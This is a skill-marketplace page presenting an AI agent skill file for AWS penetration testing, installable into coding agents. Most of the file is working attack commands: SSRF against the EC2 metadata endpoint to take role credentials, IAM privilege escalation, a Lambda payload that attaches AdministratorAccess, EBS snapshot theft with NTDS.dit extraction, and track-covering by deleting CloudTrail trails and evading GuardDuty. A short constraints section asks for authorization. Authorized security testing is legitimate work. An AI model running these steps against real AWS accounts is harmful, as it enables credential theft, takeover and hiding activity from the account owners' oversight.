How do I install AWS Penetration Testing?

Install AWS Penetration Testing with a single command: npx mdskills install sickn33/aws-penetration-testing. This downloads the skill files into your project and your AI agent picks them up automatically.

What platforms support AWS Penetration Testing?

AWS Penetration Testing works with Claude Code, Claude Desktop, Cursor, Vscode Copilot, Windsurf, Continue Dev, Codex, Gemini Cli, Amp, Roo Code, Goose, Opencode, Trae, Qodo, Command Code. Skills use the open SKILL.md format which is compatible with any AI coding agent that reads markdown instructions.

← Back to skills

AWS Penetration Testing

Name: AWS Penetration Testing: AI Agent Skill
Rating: 8 (1 reviews)
Author: sickn33

Verified

SecurityIntermediate

This skill should be used when the user asks to "pentest AWS", "test AWS security", "enumerate IAM", "exploit cloud infrastructure", "AWS privilege escalation", "S3 bucket testing", "metadata SSRF", "Lambda exploitation", or needs guidance on Amazon Web Services security assessment.

by @sickn330Updated 2 weeks ago

Add this skill

npx mdskills install sickn33/aws-penetration-testing

Fork & Edit

Skill Advisor8.0

Comprehensive offensive security guide with detailed techniques, tools, and exploitation paths

+Provides extensive enumeration and privilege escalation techniques with working commands
+Covers multiple attack vectors including SSRF, Lambda exploitation, and metadata abuse
+Includes practical tools table and troubleshooting guidance
-Lacks ethical boundaries enforcement beyond brief constraints section
-Covers track-hiding techniques that may enable malicious use

SKILL.md

Edit in Browser

1---
2name: AWS Penetration Testing
3description: This skill should be used when the user asks to "pentest AWS", "test AWS security", "enumerate IAM", "exploit cloud infrastructure", "AWS privilege escalation", "S3 bucket testing", "metadata SSRF", "Lambda exploitation", or needs guidance on Amazon Web Services security assessment.
4metadata:
5  author: zebbern
6  version: "1.1"
7---
8 
9# AWS Penetration Testing
10 
11## Purpose
12 
13Provide comprehensive techniques for penetration testing AWS cloud environments. Covers IAM enumeration, privilege escalation, SSRF to metadata endpoint, S3 bucket exploitation, Lambda code extraction, and persistence techniques for red team operations.
14 
15## Inputs/Prerequisites
16 
17- AWS CLI configured with credentials
18- Valid AWS credentials (even low-privilege)
19- Understanding of AWS IAM model
20- Python 3, boto3 library
21- Tools: Pacu, Prowler, ScoutSuite, SkyArk
22 
23## Outputs/Deliverables
24 
25- IAM privilege escalation paths
26- Extracted credentials and secrets
27- Compromised EC2/Lambda/S3 resources
28- Persistence mechanisms
29- Security audit findings
30 
31---
32 
33## Essential Tools
34 
35| Tool | Purpose | Installation |
36|------|---------|--------------|
37| Pacu | AWS exploitation framework | `git clone https://github.com/RhinoSecurityLabs/pacu` |
38| SkyArk | Shadow Admin discovery | `Import-Module .\SkyArk.ps1` |
39| Prowler | Security auditing | `pip install prowler` |
40| ScoutSuite | Multi-cloud auditing | `pip install scoutsuite` |
41| enumerate-iam | Permission enumeration | `git clone https://github.com/andresriancho/enumerate-iam` |
42| Principal Mapper | IAM analysis | `pip install principalmapper` |
43 
44---
45 
46## Core Workflow
47 
48### Step 1: Initial Enumeration
49 
50Identify the compromised identity and permissions:
51 
52```bash
53# Check current identity
54aws sts get-caller-identity
55 
56# Configure profile
57aws configure --profile compromised
58 
59# List access keys
60aws iam list-access-keys
61 
62# Enumerate permissions
63./enumerate-iam.py --access-key AKIA... --secret-key StF0q...
64```
65 
66### Step 2: IAM Enumeration
67 
68```bash
69# List all users
70aws iam list-users
71 
72# List groups for user
73aws iam list-groups-for-user --user-name TARGET_USER
74 
75# List attached policies
76aws iam list-attached-user-policies --user-name TARGET_USER
77 
78# List inline policies
79aws iam list-user-policies --user-name TARGET_USER
80 
81# Get policy details
82aws iam get-policy --policy-arn POLICY_ARN
83aws iam get-policy-version --policy-arn POLICY_ARN --version-id v1
84 
85# List roles
86aws iam list-roles
87aws iam list-attached-role-policies --role-name ROLE_NAME
88```
89 
90### Step 3: Metadata SSRF (EC2)
91 
92Exploit SSRF to access metadata endpoint (IMDSv1):
93 
94```bash
95# Access metadata endpoint
96http://169.254.169.254/latest/meta-data/
97 
98# Get IAM role name
99http://169.254.169.254/latest/meta-data/iam/security-credentials/
100 
101# Extract temporary credentials
102http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME
103 
104# Response contains:
105{
106  "AccessKeyId": "ASIA...",
107  "SecretAccessKey": "...",
108  "Token": "...",
109  "Expiration": "2019-08-01T05:20:30Z"
110}
111```
112 
113**For IMDSv2 (token required):**
114 
115```bash
116# Get token first
117TOKEN=$(curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" \
118  "http://169.254.169.254/latest/api/token")
119 
120# Use token for requests
121curl -H "X-aws-ec2-metadata-token:$TOKEN" \
122  "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
123```
124 
125**Fargate Container Credentials:**
126 
127```bash
128# Read environment for credential path
129/proc/self/environ
130# Look for: AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/...
131 
132# Access credentials
133http://169.254.170.2/v2/credentials/CREDENTIAL-PATH
134```
135 
136---
137 
138## Privilege Escalation Techniques
139 
140### Shadow Admin Permissions
141 
142These permissions are equivalent to administrator:
143 
144| Permission | Exploitation |
145|------------|--------------|
146| `iam:CreateAccessKey` | Create keys for admin user |
147| `iam:CreateLoginProfile` | Set password for any user |
148| `iam:AttachUserPolicy` | Attach admin policy to self |
149| `iam:PutUserPolicy` | Add inline admin policy |
150| `iam:AddUserToGroup` | Add self to admin group |
151| `iam:PassRole` + `ec2:RunInstances` | Launch EC2 with admin role |
152| `lambda:UpdateFunctionCode` | Inject code into Lambda |
153 
154### Create Access Key for Another User
155 
156```bash
157aws iam create-access-key --user-name target_user
158```
159 
160### Attach Admin Policy
161 
162```bash
163aws iam attach-user-policy --user-name my_username \
164  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
165```
166 
167### Add Inline Admin Policy
168 
169```bash
170aws iam put-user-policy --user-name my_username \
171  --policy-name admin_policy \
172  --policy-document file://admin-policy.json
173```
174 
175### Lambda Privilege Escalation
176 
177```python
178# code.py - Inject into Lambda function
179import boto3
180 
181def lambda_handler(event, context):
182    client = boto3.client('iam')
183    response = client.attach_user_policy(
184        UserName='my_username',
185        PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
186    )
187    return response
188```
189 
190```bash
191# Update Lambda code
192aws lambda update-function-code --function-name target_function \
193  --zip-file fileb://malicious.zip
194```
195 
196---
197 
198## S3 Bucket Exploitation
199 
200### Bucket Discovery
201 
202```bash
203# Using bucket_finder
204./bucket_finder.rb wordlist.txt
205./bucket_finder.rb --download --region us-east-1 wordlist.txt
206 
207# Common bucket URL patterns
208https://{bucket-name}.s3.amazonaws.com
209https://s3.amazonaws.com/{bucket-name}
210```
211 
212### Bucket Enumeration
213 
214```bash
215# List buckets (with creds)
216aws s3 ls
217 
218# List bucket contents
219aws s3 ls s3://bucket-name --recursive
220 
221# Download all files
222aws s3 sync s3://bucket-name ./local-folder
223```
224 
225### Public Bucket Search
226 
227```
228https://buckets.grayhatwarfare.com/
229```
230 
231---
232 
233## Lambda Exploitation
234 
235```bash
236# List Lambda functions
237aws lambda list-functions
238 
239# Get function code
240aws lambda get-function --function-name FUNCTION_NAME
241# Download URL provided in response
242 
243# Invoke function
244aws lambda invoke --function-name FUNCTION_NAME output.txt
245```
246 
247---
248 
249## SSM Command Execution
250 
251Systems Manager allows command execution on EC2 instances:
252 
253```bash
254# List managed instances
255aws ssm describe-instance-information
256 
257# Execute command
258aws ssm send-command --instance-ids "i-0123456789" \
259  --document-name "AWS-RunShellScript" \
260  --parameters commands="whoami"
261 
262# Get command output
263aws ssm list-command-invocations --command-id "CMD-ID" \
264  --details --query "CommandInvocations[].CommandPlugins[].Output"
265```
266 
267---
268 
269## EC2 Exploitation
270 
271### Mount EBS Volume
272 
273```bash
274# Create snapshot of target volume
275aws ec2 create-snapshot --volume-id vol-xxx --description "Audit"
276 
277# Create volume from snapshot
278aws ec2 create-volume --snapshot-id snap-xxx --availability-zone us-east-1a
279 
280# Attach to attacker instance
281aws ec2 attach-volume --volume-id vol-xxx --instance-id i-xxx --device /dev/xvdf
282 
283# Mount and access
284sudo mkdir /mnt/stolen
285sudo mount /dev/xvdf1 /mnt/stolen
286```
287 
288### Shadow Copy Attack (Windows DC)
289 
290```bash
291# CloudCopy technique
292# 1. Create snapshot of DC volume
293# 2. Share snapshot with attacker account
294# 3. Mount in attacker instance
295# 4. Extract NTDS.dit and SYSTEM
296secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local
297```
298 
299---
300 
301## Console Access from API Keys
302 
303Convert CLI credentials to console access:
304 
305```bash
306git clone https://github.com/NetSPI/aws_consoler
307aws_consoler -v -a AKIAXXXXXXXX -s SECRETKEY
308 
309# Generates signin URL for console access
310```
311 
312---
313 
314## Covering Tracks
315 
316### Disable CloudTrail
317 
318```bash
319# Delete trail
320aws cloudtrail delete-trail --name trail_name
321 
322# Disable global events
323aws cloudtrail update-trail --name trail_name \
324  --no-include-global-service-events
325 
326# Disable specific region
327aws cloudtrail update-trail --name trail_name \
328  --no-include-global-service-events --no-is-multi-region-trail
329```
330 
331**Note:** Kali/Parrot/Pentoo Linux triggers GuardDuty alerts based on user-agent. Use Pacu which modifies the user-agent.
332 
333---
334 
335## Quick Reference
336 
337| Task | Command |
338|------|---------|
339| Get identity | `aws sts get-caller-identity` |
340| List users | `aws iam list-users` |
341| List roles | `aws iam list-roles` |
342| List buckets | `aws s3 ls` |
343| List EC2 | `aws ec2 describe-instances` |
344| List Lambda | `aws lambda list-functions` |
345| Get metadata | `curl http://169.254.169.254/latest/meta-data/` |
346 
347---
348 
349## Constraints
350 
351**Must:**
352- Obtain written authorization before testing
353- Document all actions for audit trail
354- Test in scope resources only
355 
356**Must Not:**
357- Modify production data without approval
358- Leave persistent backdoors without documentation
359- Disable security controls permanently
360 
361**Should:**
362- Check for IMDSv2 before attempting metadata attacks
363- Enumerate thoroughly before exploitation
364- Clean up test resources after engagement
365 
366---
367 
368## Examples
369 
370### Example 1: SSRF to Admin
371 
372```bash
373# 1. Find SSRF vulnerability in web app
374https://app.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
375 
376# 2. Get role name from response
377# 3. Extract credentials
378https://app.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/AdminRole
379 
380# 4. Configure AWS CLI with stolen creds
381export AWS_ACCESS_KEY_ID=ASIA...
382export AWS_SECRET_ACCESS_KEY=...
383export AWS_SESSION_TOKEN=...
384 
385# 5. Verify access
386aws sts get-caller-identity
387```
388 
389---
390 
391## Troubleshooting
392 
393| Issue | Solution |
394|-------|----------|
395| Access Denied on all commands | Enumerate permissions with enumerate-iam |
396| Metadata endpoint blocked | Check for IMDSv2, try container metadata |
397| GuardDuty alerts | Use Pacu with custom user-agent |
398| Expired credentials | Re-fetch from metadata (temp creds rotate) |
399| CloudTrail logging actions | Consider disable or log obfuscation |
400 
401---
402 
403## Additional Resources
404 
405For advanced techniques including Lambda/API Gateway exploitation, Secrets Manager & KMS, Container security (ECS/EKS/ECR), RDS/DynamoDB exploitation, VPC lateral movement, and security checklists, see [references/advanced-aws-pentesting.md](references/advanced-aws-pentesting.md).
406

Full transparency — inspect the skill content before installing.